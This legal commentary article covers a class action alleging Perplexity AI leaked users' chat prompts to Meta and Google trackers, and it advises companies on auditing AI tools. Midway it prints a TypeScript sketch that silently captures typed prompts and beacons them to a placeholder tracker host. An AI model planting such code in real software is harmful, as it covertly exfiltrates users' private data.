Your AI Chat History Is Being Sold. A Class Action Just Made It Official.
A 135-page class action complaint landed in federal court in San Francisco on March 31, and it should make every general counsel rethink how their company uses AI chatbots. The lawsuit alleges that Perplexity AI embedded tracking tools from Meta and Google directly into its platform, sending users' chat data to both companies before Perplexity itself even processed it. No disclosure. No consent. Just a pipeline from your "private" AI conversation straight to the two largest advertising companies on earth.
The plaintiff, filing as John Doe, claims the tracking operated even when users activated Perplexity's "incognito mode," a feature the company markets as creating "anonymous threads" that "won't save to your history and expire after 24 hours." According to the complaint, that promise was hollow. Meta and Google's tracking tools allegedly harvested email addresses, Facebook IDs, IP addresses, device information, and the full text of user prompts and AI responses.
What Users Were Actually Sharing
The complaint catalogs the kinds of information people routinely share with AI chatbots: tax planning strategies, legal questions, financial advice, health concerns, political views. The plaintiff himself used Perplexity to calculate Social Security timing, plan Roth IRA conversions, and research cannabis investments. He believed those conversations were private.
That belief was reasonable. Perplexity designed its interface to feel like a conversation. The chat function mimics human interaction. The incognito mode implies privacy. Studies cited in the complaint confirm what anyone who's used these tools already knows: people share things with AI chatbots they wouldn't share with other humans, including relationship problems, health fears, and identity questions.
The disconnect between user expectations and reality is the core of this case. People treated Perplexity like a confidential advisor. The complaint says Perplexity treated their conversations like inventory.
The Legal Theory Is Familiar. The Context Is Not.
The 14 counts in the complaint draw from well-established privacy law. Invasion of privacy under the California Constitution. Violations of the state's Comprehensive Computer Data Access and Fraud Act. Claims under the federal Electronic Communications Privacy Act. Deceit and unfair competition.
None of these are novel theories. California courts have seen waves of tracking-technology litigation over the past five years. What changes here is the context: AI chatbot conversations contain qualitatively different information from website browsing history or search queries. When someone asks an AI chatbot for legal advice about a custody dispute or runs financial scenarios through it, the data is more intimate than anything a tracking pixel on a news site would capture.
Google and Meta are both named as defendants. The theory is straightforward: they built the tracking tools, they received the data, they profited from it.
Perplexity's chief communications officer, Jesse Dwyer, told reporters the company had "not been served any lawsuit that matches this description" and could not "verify its existence or claims." The complaint is publicly filed in the Northern District of California.
Two Classes, One Gap
The plaintiff seeks certification of two classes. The first covers all U.S. users who chatted with Perplexity and had their data sent to Meta or Google between December 7, 2022, and February 4, 2026. The second is a California-only subclass with the same parameters.
Paid subscribers with "Pro" or "Max" plans are excluded. A footnote explains those accounts are "subject to different terms and conditions." The implication is worth noting: free users got tracked, paid users got different terms. If that distinction holds up, it creates a two-tier privacy model where the product you don't pay for isn't the software. It's your data.
Perplexity is not a small company. The complaint notes a $20 billion valuation as of September 2025 after raising $200 million in funding. It is headquartered in San Francisco, alongside OpenAI and Anthropic. The scale of the potential class (every free U.S. Perplexity user over a period of more than three years) is enormous.
What This Means for Companies Using AI Tools
If your company has employees using AI chatbots for work (and they do, whether you've authorized it or not), this case raises immediate questions.
First, review your AI acceptable use policy. If employees are entering client data, deal terms, strategy documents, or legal questions into AI chatbots, that information may be going places your privacy policy promises it won't. The Perplexity complaint alleges the tracking happened at the code level, invisible to users. Your employees would have no way to know.
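The "code level" point deserves unpacking. Any third-party script loaded into a page shares that page's DOM, so it can read the same input fields users type into. Here is a minimal sketch of the general technique in TypeScript. The selector and endpoint are hypothetical illustrations, not Perplexity's actual code or the specific Meta and Google tools the complaint describes:

```typescript
// Illustrative sketch only. The selector and endpoint are hypothetical;
// this shows the general technique, not any party's actual tracker.
const TRACKER_ENDPOINT = "https://tracker.example.com/collect"; // hypothetical

function attachPromptListener(): void {
  // A third-party script loaded into the page shares the page's DOM,
  // so it can read the same input field the user types into.
  const promptBox = document.querySelector<HTMLTextAreaElement>("textarea");
  if (promptBox === null) return;

  promptBox.addEventListener("keydown", (event: KeyboardEvent) => {
    if (event.key !== "Enter") return;
    // Runs on submit, alongside (not instead of) the host app's handler.
    const payload = JSON.stringify({
      text: promptBox.value,       // the full prompt text
      page: window.location.href,  // where it was typed
      ts: Date.now(),
    });
    // sendBeacon fires asynchronously and survives page navigation;
    // nothing about it is visible in the UI.
    navigator.sendBeacon(TRACKER_ENDPOINT, payload);
  });
}

attachPromptListener();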
Second, audit your vendor agreements. If you're paying for enterprise AI tools, check whether the terms of service address third-party tracking and data sharing. The distinction between free and paid tiers in this case suggests that paid accounts may have different (possibly better) protections. "May" is doing heavy lifting in that sentence. Confirm it.
Third, update your data handling risk assessment. AI chatbots are a new category of data exfiltration risk. They don't look like a data breach because users voluntarily enter the information. But if that information is routed to third parties without consent, the legal exposure is the same.
What to Do Now
The Ahmad, Zavitsanos & Mensing firm out of Houston, a 60-lawyer litigation shop, is running point for the plaintiff. They describe themselves as "first and foremost a trial firm." That framing is intentional. This isn't a settlement mill filing nuisance suits. They're building for trial.
For general counsel and compliance officers, the action items are concrete:
Inventory which AI tools your organization uses. Map the data flows. Determine whether any third-party tracking operates within those tools. If you can't answer that question, neither could Perplexity's users, and that's the problem.
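For the tracking question specifically, a static scan of a tool's pages is a cheap first pass. Below is a minimal sketch in TypeScript, assuming Node 18+ for the built-in fetch; the domain list is illustrative rather than exhaustive, and the example.com URL is a placeholder for the tools on your inventory:

```typescript
// Minimal sketch: fetch a tool's landing page and flag references to
// well-known advertising/analytics domains. A static scan misses trackers
// injected at runtime; a full audit should also inspect live network traffic.
const TRACKER_DOMAINS = [
  "connect.facebook.net",     // Meta Pixel loader
  "www.googletagmanager.com", // Google Tag Manager / gtag.js
  "www.google-analytics.com", // Google Analytics collection
];

async function scanForTrackers(url: string): Promise<string[]> {
  const response = await fetch(url); // built-in fetch, Node 18+
  const html = await response.text();
  return TRACKER_DOMAINS.filter((domain) => html.includes(domain));
}

// Placeholder URL: point this at the tools on your inventory.
scanForTrackers("https://example.com").then((hits) => {
  console.log(
    hits.length === 0
      ? "No known tracker domains found in the static HTML."
      : `Tracker domains referenced: ${hits.join(", ")}`
  );
});
```

A hit from a scan like this is not proof of wrongdoing (plenty of sites run analytics legitimately), but it tells you which vendor conversations to have.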
The broader signal is clear. The AI industry spent three years telling users their conversations were private while building business models that depended on those conversations being anything but. This lawsuit is the first major test of whether courts will enforce the promises AI companies made, or whether "incognito mode" was just a marketing feature with no legal weight.
Don Ho, Esq. is Co-Founder & CEO of Kaizen AI Lab, advising companies on operational growth strategies and the legal aspects of AI integration in their businesses.